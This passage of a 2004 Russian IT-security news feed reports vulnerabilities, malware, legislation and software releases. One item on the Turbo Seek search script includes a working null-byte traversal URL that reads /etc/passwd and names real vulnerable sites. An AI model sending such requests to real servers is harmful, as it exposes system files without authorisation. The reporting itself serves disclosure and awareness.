которые не пропатчены) и удалению трояна.
Подробное описание

12/09/2004 11:56 Инструмент для безопасного удаления файлов в UNIX
Thomas C. Greene, один из редакторов известного английского информационного онлайн-агентства The Register, сообщает о создании им небольшого шелл-скрипта, который позволяет безопасно осуществлять удаление файлов в системе при помощи заполнения содержимого освобождающегося дискового пространства (своп-раздел, корневой раздел или весь диск) случайными данными, формируемыми с использованием устройства генератора случайных чисел, встроенного в ядро /dev/urandom (cпециальный символьный файл). Генератор случайных чисел собирает окружающий шум с драйверов устройств и из других источников в пул энтропии. Генератор также постоянно оценивает количество бит шума в пуле энтропии. Именно с помощью этого пула создаются случайные числа (выдержка из мануала). Автор просит протестировать его скрипт и выдать рекомендации (пожелания). Название набора скриптов - LinuxWipeTools.
Cкачать

12/09/2004 11:24 Уязвимость в OpenOffice
Обнаружена уязвимость в популярном в мире открытых систем офисном пакете OpenOffice. Эта уязвимость позволяет локальным пользователям просматривать документ, который создаётся в OpenOffice. Уязвимость связана с некорректными полномочиями на директорию, в которой сохраняются промежуточные результаты. Как пишет автор, при открытии файла в OpenOffice создаётся временная директория /tmp/sv.tmp, где - cлучайное число из 3-х случайных символов. Полномочия на эту директорию позволяет другим локальным пользователям получать доступ к содержимому файла, который создаётся в OpenOffice. После сохранения файла он сохраняется в виде zip-файла, к котором тоже можно получить доступ. В принципе, это проблема больше маски полномочий, которые могут задаваться самим пользователем в профайле шелла, с которым он работает (задаётся командой umask). В качестве меры безопасности как раз и рекомендуется установить безопасную маску при помощи umask. Разумеется, уязвимость присутствует только на многопользовательских графических рабочих станциях.
Подробности

11/09/2004 18:01 Triance OS — коммерческая ОС на базе FreeBSD
Triance OS — новая коммерческая операционная система, сообщает nixp.ru. Будучи основанной на FreeBSD, популярной разновидности UNIX, система является надежной, масштабируемой, интегрированной и безопасной. Предназначена для широко использования: как система корпоративного уровня и в качестве ОС для настольного ПК. В качестве графического окружения используется KDE, установка, настройка и обновление которого не составит труда.
Сайт проекта

11/09/2004 17:38 Что нового ожидается в SpamAssassin 3.0
SpamAssassin является, пожалуй одним из самых удачных ПО для фильтрации спама на стороне почтового сервера. В статье на сайте ONLamp.com, принадлежащем известному издательству O’Reilly Media, Inc. опубликована статья Алана Шварца, одного из авторов этого пакета о том, что нового нас ожидает в готовящейся к выпуску версии 3.0.0 (пока существует, как "бета" и RC). Если сказать вкратце, то ожидаются следующие изменения: добавлены новые статические правила; обновлён API, в частности API для вызова SpamAssassin из сценариев Perl (2 популярных приложения, основанные на API SpamAssassin - MIMEDefang и amavisd-new уже переписаны для поддержки 3-й версии SA); включены новые плагины - RelayCountry, Hashcash, URIDNSBL, небезызвестный Sender Policy Framework (SPF); включена поддержка SQL и LDAP; улучшенные поддержка внутренних (интранет) сетей; изменения в политике лицензирования (SA сейчас является составной частью проекта Apache Software Foundation, поэтому выпускается на условиях т.н. Apache Software License); несколько изменены команды и механизм для обновления (апгрейда).
Cтатья

11/09/2004 16:22 Террористы устроили в столице виртуальный джихад
На Москву обрушился поток жутких посланий по электронной почте. Содержание у всех одно и то же: ждите новых терактов. В каждом — обязательная ссылка на “достоверные источники” и “родственника в ФСБ” (МВД, Кремле, прокуратуре и т.д.). Письма в массовом порядке приходят на адреса организаций и частных лиц. Вот текст одного из таких “писем несчастья”: “Только что прислала хорошая знакомая, с родней в ФСБ. Дорогие мои! Хочу Вас проинформировать, что несколько минут назад я получила информацию из источников, на 200% заслуживающих доверия, о том, что в Москве на данный час находится минимум 20 террористов-смертников и запланирован ряд крупных террористических актов на период этой недели. По возможности надо исключить посещение метро, общественного наземного транспорта, кафе, торговых центров, рынков, а лучше вообще на время уехать из Москвы. Пожалуйста, берегите себя и своих близких. Это все не шутки, а очень страшная реальность”. Тексты писем похожи, различаются лишь в деталях. В другом “экземпляре” говорится об “отравлении питьевой воды”, еще в одном — просьба “отправить друзьям и коллегам”... — Совершенно очевидно: нагнетается паника, — уверены психологи. — Сейчас, когда еще не забылись страшные кадры Беслана, люди особенно ранимы. И одного подобного сообщения достаточно, чтобы страх пошел “по цепочке”: один прочитал, позвонил другому, третьему и т.д. Совет один: попытаться правильно это оценить — именно как попытку запустить механизм массовой истерии. С точки зрения специалистов-компьютерщиков, “письма несчастья” — стопроцентный “заказ”.
SecurityLab

11/09/2004 16:01 Немецкий хакер исследовал беспроводные сети Манилы
Немецкий хакер Van Hauser в процессе езды по улицам столицы Филиппин Манилы (в рамках выполнения так называемого "wardriving") обнаружил, что из 66 точек доступа к бепросодным сетям (WAP) только 15 из них применяли шифрование (да и те, как утверждает Ван Хаузер, не обладали достаточным уровнем криптостойкости). Сканировались два округа Манилы, в которых расположены основные бизнес-центры - Makati и Malate. Акция осуществлялась в рамках проходящего в Маниле третьей ежегодной конференции по безопасности информационных технологий. Как сообщает Ван Хаузер, любой хакер, обладающий лэптопом и соответствующим софтом мог бы подключить к любой из WiFi-сетей Манилы. Как написано на сайте, Ван Хаузер в свои 29 лет выполняет различные работы по так называемому "этическому" хакерству для различных компаний в Германии и входит в команду разработчиков SuSe Linux. Кроме того, Ван Хаузер является членом знаменитой (в определённых кругах) немецкой хакерской группы THC.
Подробности

11/09/2004 12:24 Уязвимость в библиотеке wvWare
iDEFENSE сообщает об уязвимости в библиотеке wvWare, которая используется для загрузки и разбора файлов Microsoft Word в UNIX-ОС. Также эта библиотека используется некоторыми производителями ПО для просмотра и конвертации Word-файлов. Уязвимость присутствует в функции wvHandleDateTimePicture() файла field.c, которая производит разбор поля DateTime документа. Создав специальный файл, злоумышленник может вызвать переполнение буфера при разборе поля в вызове strcat() и выполнить произвольный код от имени пользователя, запустившего файл. Dom Lachowicz выпустил патч, закрывающий уязвимость.
Подробное описание

11/09/2004 11:57 Интернет приходит в телевизоры
Норвежская компания Opera Software готовит к выпуску новую технологию рендеринга веб-страниц, специально предназначенную для телевизоров. Благодаря технологии TV Rendering сайты будут идеально четко выглядеть на экране любого ТВ. Как известно, веб-сайты обычно оптимизируются для демонстрации на мониторах с высоким разрешением: например, 1024х768, 800х600 или 640х480, в то время как экран обычного телевизора имеет гораздо меньше пикселов, поэтому при демонстрации на экране ТВ цвета искажаются, а текст бывает невозможно прочитать. Новая технология TV Rendering (TVR), разработанная компанией Opera, способна устранить все эти недостатки. Нужно заметить, что TVR — первая в мире технология такого рода. Раньше никто не задумывался о нуждах тех несчастных пользователей, которые выходят в интернет с помощью специальных приставок или вынуждены подключать телеприемник к компьютеру. Однако, например, в США, таких пользователей приставок довольно много: это, в основном, абоненты продвинутых сетей кабельного телевидения, в которых оператор кабельной сети предлагает своим клиентам одновременно и широкополосный доступ в интернет (по тому же кабелю), а также продает недорогие «интернет-приставки».
Подробнее

11/09/2004 11:19 Откладывается выход новой версии ASPLinux
Компания ASPLinux вновь перенесла дату выпуска новой версии своего дистрибутива ОС Linux. Новый дистрибутив будет основан на репозитарии Fedora, создаваемом сообществом разработчиков под эгидой компании Red Hat. Выбор Fedora Core в качестве базы для новой версии дистрибутива ASPLinux обусловлен тем, что, на взгляд компании, в настоящее время это наиболее качественный и быстро обновляющийся репозитарий. Первоначально, выпуск очередной версии дистрибутива ASPLinux намечался на начало лета 2004 года, практически сразу после выпуска стабильного варианта Fedora Core 2. Однако затем выход дистрибутива ASPLinux был отложен, поскольку доступный летом вариант Fedora Core 2 был признан все же недостаточно стабильным, из-за чего выход основанного на нем дистрибутива ASPLinux был отложен на третий квартал. Существующая версия Fedora Core 2 постоянно дополняется и совершенствуется. В доработке Fedora Core 2 принимают участие и специалисты ASPLinux. В настоящее время выход стабильной версии дистрибутива ASPLinux, базирующегося на Fedora Core 2, запланирован на начало четвертого квартала 2004 года, говорится в пресс-релизе компании.
Источник

11/09/2004 10:58 Безопасность сети (защита от подмены адресов) на основе 802.1х и SFlow
Интересная статья опубликована на сайте Opennet.ru. В статье "Безопасность сети на основе 802.1х и SFlow, "идеальная и недостижимая"" рассказывается об относительно новом способе борьбы с подменой адресов пользователями, базирующемся на использовании стандарта 802.1х (Port Based Network Access Control) совместно с технологией SFlow. Автор статьи, Владислав Пинженин, разбил статью на 2 части: первая часть описывает спецификацию IEEE 802.1x и затрагивает основные особенности применения спецификации на практике, поднимая вопросы уязвимости предлагаемой защиты, ответ на которые дается во второй части статьи, описывающей решение, позволяющее избежать негативных моментов, выявленных на практике, в ходе реальных внедрений.
Cтатья

11/09/2004 10:19 В США будет ужесточен закон о копирайте
Юридический комитет Палаты представителей Конгресса США проголосовал за ужесточение мер борьбы с незаконным копированием защищенной копирайтом информации, сообщает агентство Reuters. Теперь пользователи пиринговых сетей, скачавшие и выложившие для обмена более тысячи песен, могут быть заключены под стражу на срок до трех лет. Такой же срок тюремного заключения получат граждане, записывающие фильмы во время демонстрации в кинотеатрах. Предусматривается также и иммунитет от закона о копирайте для компаний, вырезающих сцены насилия и непристойные сцены из фильмов, для того чтобы сделать их пригодными для семейного просмотра. Данный законопроект уже вызвал нарекания со стороны конгрессмена Говарда Бермана, члена Демократической партии США, который высказал опасения, что третьи лица получают потенциальную возможность безнаказанно изымать коммерческую рекламу из телевизионных программ или же, напротив, вставлять собственную. Наряду с ужесточением закона о копирайте юридический комитет Палаты представителей одобрил меру наказания в виде тюремного заключения на трехлетний срок для распространителей программ-шпионов. Похожие законопроекты были одобрены Сенатом США еще в июне. После принятия закона Министерство юстиции США учредит программу, в рамках которой общество будет ознакомлено с новыми нормами авторского права. Пользователи интернета, подозреваемые в незаконном копировании музыкальных композиций, будут получать предупреждения от работников Министерства юстиции. Ранее подобные предупреждения рассылались звукозаписывающими компаниями перед подачей судебных исков.
"Компьюлента"

10/09/2004 17:15 Уязвимость в Search Engine & Directory Powered by Turbo Seek
Обнаружена уязвимость в Search Engine & Directory Powered by Turbo Seek, выпускаемом FocalMedia.Net. Из-за того, что ПО не фильтрует "null-byte poison" (возможность вставки символа %00 в конце строки запроса) в скрипте tseekdir.cgi, возникает возможность просмотра важных системных файлов. В качестве примера можно посмотреть содержимое файла /etc/passwd, ссформировав запрос вида http://www.xxx.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00. Автор (durito из LwB Security Team) приводит примеры доступа к файлам /etc/passwd конкретных Вэб-сайтов (www.uscomputer.net, www.micro2media.com и т.д.).
UINC

10/09/2004 15:30 Apple выпустила обновление для Mac OS X
Apple выпустила обновление для Mac OS X под названием Security Update 2004-09-07, которое закрывает многочисленные уязвимости в безопасности, обнаруженные ранее. Среди уязвимостей, о которых сообщалось ранее, две дыры в mod_ssl и apache, которые могут быть использованы для проведения DoS (Denial of Service) атак; уязвимости в CoreFoundation и lukemftpd, позволяющие повысить привилегия пользователей; уязвимость в IPsec реализации, позволяющая обойти ограничения безопасности; уязвимость в Kerberos, позволяющая выполнить произвольный код; уязвимости в OpenLDAP позволяющие использовать шифрованный пароль как "plain text"; уязвимость в OpenSSH, позволяющая перезаписать произвлольный файл и многие другие.
Подробности

10/09/2004 15:13 Sybase выпустила бесплатную версию своей СУБД для Linux
Sybase, Inc. объявила о выходе бесплатной ("free as in beer") версии своего основного продукта для Linux под названием "Sybase ASE Express Edition for Linux", сообщает linux.org.ru. Несмотря на бесплатность, код остается закрытым. У данной версии имеются следующие ограничения на железо: только один CPU, объем данных не более 5GB, и до 2GB памяти. Тем не менее, этого вполне достаточно для разработки, а также для подавляющего большинства небольших десктопных и веб-приложений, что позволяет говорить об этой редакции как конкуренте MySQL и PostgreSQL. Кроме того, используемый Sybase диалект Transact-SQL применяется также в MS SQL Server, и теперь можно будет легко переносить созданные под MSSQL программы на Linux+Sybase. Sybase также предлагает платную поддержку этой версии. Цены на поддержку начинаются с $2200 в год.
Подробности

10/09/2004 14:45 В США будет принят закон против spyware
Согласно выдвинутому Конгрессом США законопроекту, хакеры, скрытно устанавливающие шпионские программы на компьютеры ничего не подозревающих пользователей интернета, могут получить три года тюремного заключения, сообщает агентство Reuters. Юридический комитет Палаты представителей Конгресса США одобрил предложенный законопроект, который поможет бороться с правонарушителями, устанавливающими программы-шпионы для кражи личных данных и совершения других онлайновых преступлений. Проект закона отправлен на рассмотрение в нижней палаты. Данный законопроект будет объединен с законопроектом, получившим одобрение в торговом комитете Сената США в этом году, который требует, чтобы производители ПО уведомляли пользователей об установке новых программ на их компьютеры.
Yahoo.com

10/09/2004 14:39 Microsoft готовит к выпуску виртуальный сервер
Компания Microsoft готовит к выпуску пакет Virtual Server 2005, сообщает "Компьюлента". Он предназначен для создания нескольких виртуальных серверов на одном физическом компьютере. На виртуальные серверы можно устанавливать любые операционные системы: Windows, Linux, различные варианты Unix и т.д. Физический сервер при этом должен работать под управлением Windows Server 2003. Как сообщает издание Microsoft Watch, Virtual Server 2005 будет выпущен в двух вариантах - Standard и Enterprise. Первый вариант будет стоить 499 долларов США и сможет использоваться на серверах с числом процессоров до четырех. Версия Enterprise будет работать на любых серверах, вплоть до 32-процессорных, и стоит 999 долларов. Одновременно готовится к выходу и инструментарий Virtual Server Migration Toolkit, предназначенный для облегчения миграции со старых систем на базе физических серверов на новые, использующие виртуальные машины. Стоит также отметить, что Virtual Server 2005 разрабатывался на базе технологий компании Connectix, которую Microsoft купила в 2003 году. Эта компания была известна благодаря своему пакету VirtualPC, позволявшему создавать виртуальные компьютеры на платформе PC в среде Mac OS. Позднее аналогичные продукты появились и для других ОС. Платформа Virtual Server также первоначально разрабатывалась в Connectix, хотя коммерческого продукта компания выпустить не успела.
Подробности

10/09/2004 14:13 Intel готов перестроить весь интернет по-своему
Корпорация Intel собирается сыграть ведущую роль в построении интернета будущего, передает Reuters. Жизнедеятельность новой всемирной паутина должны будут поддерживать серверы, работающие на процессорах Intel. Эксперты компании считают, что в своем нынешнем виде сеть не сможет выдержать прихода миллионов новых пользователей из развивающихся стран, так как основывается на технологиях 1970-х годов. Вместо того чтобы постепенно заменять оборудование и программные коды глава отдела технологий Intel Патрик Гелсингер (Patrick Gelsinger) призывает создать абсолютно новую структуру. Она уже существует в модели, носит имя PlanetLab и представляет собой 429 связанных друг с другом компьютера в разных точках земли. В проекте испытываются разработки Intel, кроме того, он спонсируется корпорацией. При этом в работу над ним вовлечены 150 различных лабораторий (от Принстонского университета до Hewlett-Packard). По словам Гелсингера, эта структура будет адаптироваться ко всем угрозам, справляться со взрывным ростом числа обращений к серверам (и, таким образом, предотвращать их падения) и не только анализировать, но и управлять трафиком, а также поддерживать некоторые новые сетевые возможности. Отвечая на вопрос, какой интерес преследует его компания, глава отдела технологий Intel сказал: "Если сеть вырастет до 100 миллиардов, подключенных к ней устройств, то наша цель иметь в каждом из них хоть что-то от Intel". "Вдобавок, - сказал он, - миллиарды компьютеров, маршрутизаторов и тому подобного, что нужно для обслуживания сотни миллиардов соединений. Продолжения роста интернета - это наш бизнес".
Lenta.Ru

10/09/2004 13:59 Троян Dica-Kit поражает Linux-компьютеры
Компания Sophos обнаружила вредоносную программу Dica-Kit, поражающую компьютеры под управлением операционных систем Linux. Как сообщается, Dica-Kit представляет собой классический хакерский Rootkit-инструмент. Прежде чем установить вредоносную программу на машину-жертву, злоумышленнику необходимо получить к компьютеру первоначальный доступ. Тем не менее, троян представляет весьма большую опасность. Dica-Kit, в частности, заменяет основные системные утилиты, такие как netstat, tcpd, ls, ps и pstree, собственными версиями, что усложняет процесс обнаружения трояна. Кроме того, Dica-Kit открывает "черный ход" в систему и ворует конфиденциальную информацию.
compulenta.ru

10/09/2004 13:59 Электронный документ как вещественное доказательство
Материал под таким названием опубликовал сегодня crime-research.ru. Электронные документы все чаще становятся предметом и средством совершения различных преступлений, являются доказательствами по уголовным делам. В связи с этим, автор статьи Виталий Вехов, проводит анализ действующего законодательства. Анализ УПК РФ показывает, что электронный документ допускается в качестве доказательства по уголовному делу при наличии хотя бы одного из следующих условий: если он служил орудием преступления; сохранил на себе следы преступления; является предметом преступления; является имуществом, ценной бумагой и иной ценностью, полученной в результате преступных действий либо нажитой преступным путем; может служить средством для обнаружения преступления и установления обстоятельств уголовного дела; если изложенные в нем сведения имеют значение для установления обстоятельств, подлежащих доказыванию по уголовному делу.
Далее

10/09/2004 13:40 Google проводит интернет-конкурс для программистов
Под патронажем Google проходит в этом году один из самых интересных в мире программистских конкурсов Code Jam 2004. Как заявляют организаторы, это состязание для настоящих фанатиков, которые способны сделать с компьютером что угодно лишь парой команд, а также обожают решать сложные задачи. Именно такие «фанатики» и нужны Google, которая, судя по всему, поставила перед собой задачу создать фирму сплошь из гениев. Так или иначе, но в этом году соревнования программистов обещают стать как никогда упорными, ведь на это дело выделен призовой фонд $50 тыс., а финальный раунд пройдет прямо в кампусе Googleplex, о котором ходят легенды. Для выхода в финал сначала нужно зарегистрироваться на сайте и принять участие в квалификационном раунде, который начнется 15 сентября. Правила описаны в документации. Все участники будут решать одинаковые задания, с одинаковым лимитом времени (по 60 мин на задачу). Разрешается использовать один из следующих языков:
Java (1.4.1)
C# (NET Framework v. 1.0.3705)
Visual Basic (NET Framework v. 1.0.3705)
C++ (gcc 3.2.2)
Подробнее

10/09/2004 13:19 Эпидемия червя I-Worm.Mydoom.t
"Лаборатория Касперского" предупреждает о росте числа заражений почтовым червем I-Worm.Mydoom.t. Новая версия нашумевшего в начале этого года червя Mydoom практически не отличается от обнаруженной в августе версии I-Worm.Mydoom.q. Для защиты пользователей от I-Worm.Mydoom.t "Лабораторией Касперского" несколько часов назад было выпущено срочное обновление антивирусных баз. напомним, что большинство вирусов-червей этого семейства распространяется через интернет в виде файлов, прикрепленных к зараженным письмам. Червь Mydoom.t является приложением Windows (PE EXE-файл), имеет размер около 18 КБ (упакован UPX, размер распакованного файла - около 34 КБ). Червь активизируется, только если пользователь сам запускает зараженный файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения.
viruslist.ru

9/09/2004 21:16 Поклонникам сетевых дневников поставили диагноз
Принято считать, что дневники делают жизнь людей легче. Изливая на бумагу наболевшее, страдальцы тем самым избавляются от отрицательных эмоций. Последние исследования британских ученых опровергает это правило. Доктор Дэвид Шеффилд из университета Стаффордшира обнаружил, что те, кто ведет дневник, чувствует себя гораздо хуже, нежели те, кто предпочитают все свое носить в себе. "Писатели" чаще страдают от головных болей, хуже спят, испытывают сложности с желудком, а также плохо уживаются в обществе. Свои выводы Шеффилд делает на основе опросов, в которых участвовало почти 150 человек. При этом 94 из них регулярно вели дневник, а 41 респондент предпочитал заниматься более приятными вещами. Данные исследования показали, что "любители письменности" гораздо чаще страдают от физических недугов, нежели из коллеги, которые никаких записей не вели. Подводя итоги, психологи объяснили результаты своего опроса тем, что дневник отнюдь не отвлекает от повседневных проблем, а, наоборот, зацикливает на неудачах и недугах. Это собственно и становится причиной ухудшения здоровья у людей, ведущих дневник.
Utro.Ru

9/09/2004 20:54 Отважное заявление главы британского представительства MS
Глава представительства Microsoft в Великобритании Алистер Бэйкер (Alistair Baker) бросил всем хакерам вызов:"Сервис-паки и обновления, выпущенные нашей компанией для Windows XP в прошлом месяце, стали первой разделительной чертой в нашей борьбе за безопасность и против спама", сообщает bugtraq.ru со ссылкой на сайт telegraph.co.uk. Он также заявил, что "будет весьма удивлён, если кому-нибудь удастся пройти этот барьер".. Букмекерские конторы начали приём ставок на взлом и нахождение новых уязвимостей ДО конца этого года в соотношении 2 к 1.
P.S. Жаль, что м-р Бэйкер не прокомментировал УЖЕ обнаруженную проблему с "Microsoft Internet Explorer Drag and Drop Vulnerability".
SecurityLab.Ru

9/09/2004 16:31 Создателю Sasser шьют «саботаж»
Умышленные уничтожение, блокирование, приведение в непригодное состояние компьютерной информации или программы, либо вывод из строя компьютерного оборудования, либо разрушение компьютерной системы, сети или машинного носителя. До пяти лет. Восемнадцатилетнему Свену Яшану (Sven Jaschan), сознавшемуся в написании наделавшего много шума интернет-вируса Sasser, в среду было предъявлено обвинение в совершении акта компьютерного саботажа. Об этом, со ссылкой на прокуратуру Нижней Саксонии, сообщает агентство Associated Press. Похоже, что юноше, настаивавшему на том, что Netsky A задумывался им как противоядие против разбушевавшихся вирусов MyDoom и Bagle, не удалось смягчить суровые сердца прокурорских работников. Как известно, собственно Sasser является одним из многочисленных штаммов Netsky, созданным с целью эксплуатации дыры в защите некоторых операционных систем из семейства Windows. Результатом деятельности червя стали постоянные зависания и перезагрузки системы, делавшие практически невозможной работу на зараженных компьютерах. На сегодняшний день Свену светят до пяти лет тюремного заключения, а также 143 гражданских иска на общую сумму не менее 157 тысяч долларов не считая судебных издержек.
Internet.Ru

9/09/2004 15:53 Серьезная авария в сети "Демос-Интернет" (Москва)
Как стало известно редакции PPR, 8 сентября 2004 г. в сети компании "Демос-Интернет" произошла авария. Около 13:57 МСК была потеряна связность с зарубежными сетями, которая была восстановлена только в районе 20:17. Связность с российскими сетями сохранялась, однако из-за проблем с DNS-серверами пользование сетью для конечных пользователей также было затруднено. Судя по высокому уровню загруженности телефонов техподдержки компании, авария была достаточно серьезной и затронула значительное число клиентов компании. К настоящему моменту точной информации о причинах и масштабе аварии нет. Официальных комментариев со стороны администрации "Демос-Интернет" пока не поступало.
PPR

9/09/2004 15:27 Русские хакеры терроризируют Австралию
Атака русских хакеров на онлайновых букмекеров на 5 часов вывела из строя телефонную сеть крупнейшего австралийского оператора проводной связи Telstra. Как сообщает издание Australian IT News, на днях выяснилось, что в мае текущего года хакеры, причисляющие себя к «русской мафии», провели атаку на две сетевые букмекерские конторы — Multibet.com и Centrebet. В результате сети обеих компаний перестали на некоторое время функционировать, убытки букмекеров составили несколько миллионов долларов. Атака была предпринята после того, как руководители компаний отказались удовлетворить требования шантажистов, заключавшиеся в перечислении крупных денежных сумм на их счета. От Multibet.com хакеры требовали $20 тыс., от Centrebet — $10 тыс. Это сообщение поступило в разгар скандала, связанного с деятельностью «русской мафии» в Австралии. Ряд австралийских бизнесменов, работающих в сфере электронной коммерции (букмекерские конторы, магазины, аукционы) в течение последнего месяца выступили с заявлениями о том, что они подвергаются шантажу со стороны компьютерных злоумышленников, причисляющих себя к «русской мафии». Хамиш Эвидсон (Hamish Davidson), владелец компании Sportsbetting из г. Воллонгонг, заявил, что неоднократно получал по электронной почте требования уплатить деньги за ненападение на свой сайт. При этом он отметил, что в своих посланиях, преступники заявляли о себе, как о «русской мафии». «В первый раз мой сайт вывели из строя на три или четыре дня, — сообщил он. — Тем не менее, я не стал платить». Федеральная полиция Австралии, Интерпол, ФБР и британский национальный центр по борьбе с преступностью в сфере высоких технологий уже ведут ряд расследований в отношении «русской мафии», а также других восточноевропейских преступных сообществ, специализирующихся на вымогательстве денег у сетевых коммерсантов под угрозой атаки на их сайты. Однако атака на сайты Multibet.com и Centrebet затронула не только букмекеров и их клиентов. В распространённом на днях официальном заявлении представители телекоммуникационной компании Telstra, крупнейшего в стране провайдера услуг доступа в интернет и голосовой связи, сообщили, что вследствие этой атаки была выведена из строя телефонная сеть в городе Элис Спрингс. На протяжении 5 часов жители этого города были отрезаны от внешнего мира, не имея возможности пользоваться электронной почтой и телефоном. Представитель Telstra Род Брюем (Rod Bruem) сообщил, что осуществленная в мае этого года атака на Multibet.com и Centrebet привела к «остановке системы» телекоммуникационной компании. Специалисты обвинили компанию в пренебрежении мерами безопасности, та, в свою очередь, обещала впредь избегать подобных инцидентов.
CNews

9/09/2004 15:10 .com и .net зоны станут обновляться каждые 15 минут.
VeriSign объявила об изменениях в поддержке .com и .net DNS зон. С сегодняшнего дня SOA запись для этих зон претерпела изменения: Для указанных зон время негативного кэширования (для TLD зоны определяет время синхронизации изменений на корневых DNS серверах) определено не каждые 12 часов как раньше, а каждые 15 минут ("minimum TTL" было 86400, стало 900). Также изменен формат порядкового номера "serial" (было YYYYMMDDNN, стало число секунд с 1970 года).
Opennet

9/09/2004 14:08 Работа над ошибками
Компании Apple и Red Hat практически одновременно обновили свои операционные системы. Apple выпустила кумулятивное исправление для своих операционных систем, которое устраняет 15 дефектов защиты. Среди них уязвимости в службах Kerberos, OpenLDAP, OpenSSH и др., а также исправления браузера Safari, библиотеки libpng и стека протоколов TCP/IP. Red Hat представила Red Hat Enterprise Linux 3 Update 3, в котором появилась поддержка защитных технологий Exec-shield, PIE (Position Independent Executable) и неисполнимых страниц памяти NX (No-eXecute), которые препятствуют организации атак на переполнение буфера. Фактически это можно расценивать как ответ сообщества Open Source на выпущенное недавно обновление Windows XP Service Pack 2, в котором интегрированы аналогичные технологии.
"Открытые системы"

9/09/2004 13:58 Взломана компьютерная база секретных данных силовых структур Литвы
Газета Lietuvos rytas во вторник опубликовала сообщение, где говорится о том, что секретная информация министерства внутренних дел и департамента госбезопасности могла стать достоянием частных лиц. Об этом генеральный комиссар полиции Витаутас Григаравичюс доложил председателю Сейма Артурасу Паулаускасу. Он также отказался от публичных комментариев происшедшего, сообщив лишь, что проводится оперативное расследование. Газета не указывает названия фирмы, которая вскрыла базу секретных данных, говорится лишь, что "это частная и очень солидная фирма". О происшедшем информирован президент Литвы Валдус Адамкус.
SecurityLab

9/09/2004 12:34 Обновление пакетов в Fedora
Red Hat выпущена обновления для проекта Fedora Core (бесплатный дистрибутив от Red Hat, пришедший на смену Red Hat, после прекращения тех. поддержки версий 7.x, 8, 9). Выпущена обновления для kdelibs и kdebase. Они исправляют множественные уязвимости обнаруженные ранее в этих пакетах, которые позволяли повысить привилегия, подменять контент веб-сайтов и перехватывать сессии.
Secunia

9/09/2004 12:12 Армия США обновляет программное обеспечение для защиты от хакеров
Вооруженные силы США готовы выделить 30 млн долларов на обновление системы компьютерной безопасности на базе штурмовых вертолетов Форт Кэмпбелл. По данным журнала Federal Computer Week, поводом для обновления системы стала массивная хакерская атака на ресурсы базы. Ранее военное командование заявило о своем намерении отказаться от использования операционной системы Windows NT 4.0 в пользу службы каталогов Active Directory. Впрочем, представители IT-индустрии, пожелавшие остаться неизвестными, утверждают, что все обновления вызваны исключительно хакерской атакой. Проблемы кибербезопасности для Министерства обороны США стали особенно актуальны после нескольких заявлений военных. По их словам, в будущих войнах обмен информацией будет ускорен за счет компьютерных сетей. Однако такой способ передачи данных делает их уязвимыми и для противника. Представители военного командования отказываются обсуждать детали хакерского вторжения в сеть Форта Кэмпбелл. Однако осведомленные источники Federal Computer Week утверждают, что инциденты произошли осенью прошлого года. В результате специальную работу на базе вертолетов провели эксперты армейской группы реагирования на компьютерные аварии (CERT). По некоторым данным, хакеры имели доступ к военной компьютерной сети в течение пары месяцев. Установить, где находились взломщики сети, экспертам не удалось. Армейские эксперты отметили значительный рост числа попыток взломать военные сети за последние три года. В 2001 году таких инцидентов было зафиксировано 40076, в 2002 - 43086, в 2003 - 54448. В 2004 году только в июне таких попыток было 24745.
Viruslist

9/09/2004 11:37 Спорная технология Microsoft найдет пристанище в Longhorn
Microsoft продолжает модернизировать раскритикованную архитектуру защищенных ПК, но все же планирует включить ее в следующую версию Windows. Софтверный гигант утверждает, что Longhorn сможет работать как с включенной, так и с отключенной технологией Next Generation Secure Computing Base (NGSCB), предназначенной для повышения уровня безопасности ПК путем размещения важных данных и исполнения операций в специальной изолированной части операционной системы. Кроме того, Microsoft продолжает модернизировать эту технологию, которая и так уже существенно отличается от того, что было представлено разработчикам на конференции Microsoft Professional Developer Conference в прошлом году. «Мы ввели некоторые изменения с учетом реакции отрасли, — сказал в среду во время презентации на Intel Developer Forum в Сан-Франциско технический идеолог Windows Стив Хейл. Обновленная NGSCB позволит использующим ее компаниям изолировать такие данные, как набираемый на клавиатуре текст и идентификаторы пользователя, в отдельном «отсеке» внутри Windows, что должно усложнить хакерам доступ к подобной информации. Одно из важных изменений заключается в том, что теперь эти отсеки основаны на интерфейсах программирования Windows, а не на специализированном коде, который требовался в версии, представленной на Professional Developer Conference. Технология по-прежнему позволяет компаниям исполнять внутри защищенного слоя специальные программы, или «сценарии», хотя сегодня Microsoft меньше упирает на это, чем год назад. Тогда высказывались опасения, что Microsoft пытается привязать заказчиков к Windows и что пользователи могут лишиться доступа к своим данным.
ZDNet

9/09/2004 11:23 Microsoft поможет пользователям забыть о паролях
В следующем году проблема запоминания множества паролей для пользователей компьютеров может кануть в лету. Компания Microsoft на этой неделе представила новую линейку устройств для мгновенного доступа к защищенным паролями сайтам. Об этом сообщает сайт iTnews.com.au. В компьютерные клавиатуры и оптические мыши разработчики встроили сканеры, считывающие отпечатки пальцев. Новое оборудование и программное обеспечение позволяет пользователю получать доступ к базе паролей одним касанием и избавляет от необходимости их запоминать или записывать. По словам представителей компании, на разработку новых устройств были потрачены довольно серьезные средства. В целом на исследования и инновации Microsoft тратит около 6 миллиардов долларов в год. Подобные разработки ведутся и другими компаниями, такими, как Sony и Targus. Как полагают специалисты, устройства разработаны скорее для удобства пользователей, нежели в целях безопасности, и новшество может стать весьма популярным. Ожидается, что модели поступят в продажу в начале 2005 года. Ориентировочная цена мыши со встроенным сканером составит примерно 55 долларов, а клавиатуры - 110 долларов.
Lenta.ru

8/09/2004 15:46 В операционной системе Sun Solaris обнаружена уязвимость
В операционной системе Sun Solaris восьмой версии обнаружена уязвимость, сообщает SecurityLab.Ru. Как сообщается, дыра может использоваться злоумышленниками с целью организации DoS-атак на удаленные системы с запущенными служебными программами in.named (переводя на нормальный язык - на DNS-серверы). Результатом проведения атаки может стать отказ сервиса DNS (Domain Name System) и всех связанных с ним приложений. Правда, для осуществления нападения злоумышленнику потребуется регистрация в системе, в связи с чем уязвимости присвоен рейтинг низкой опасности.
Описание

8/09/2004 12:06 Выход GCC 3.4.2
Вышла новая версия популярного компилятора GCC версии 3.4. Улучшений довольно много, все в основном связаны с исправлением обнаруженных ошибок - исправлены внутренние ошибки компиляции программ, исправлены ошибки, которые иногда возникали при компиляции с флагами оптимизации (-O), улучшена работа компилятора при работе с кодом C++ и т.д. В настоящий момент ведётся усиленная работа над новой версией компилятора 3.5.
Изменения в версии 3.4.2

8/09/2004 11:26 Уязвимость в mpg123
